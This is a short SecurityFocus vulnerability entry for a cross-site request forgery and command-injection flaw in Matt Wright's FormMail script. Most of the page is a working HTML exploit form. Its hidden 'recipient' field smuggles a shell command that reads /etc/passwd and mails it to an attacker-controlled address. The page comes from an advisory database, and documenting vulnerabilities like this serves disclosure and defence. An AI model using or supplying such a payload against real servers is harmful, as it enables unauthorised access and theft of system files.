Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Matt Wright FormMail Cross-Site Request Forgery Vulnerability

This exploit, taken from "The Most Comprehensive List of CGI & httpd Bugs" (see Credit) also exploits BugTraq ID 2079.

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>







 

Privacy Statement
Copyright 2008, SecurityFocus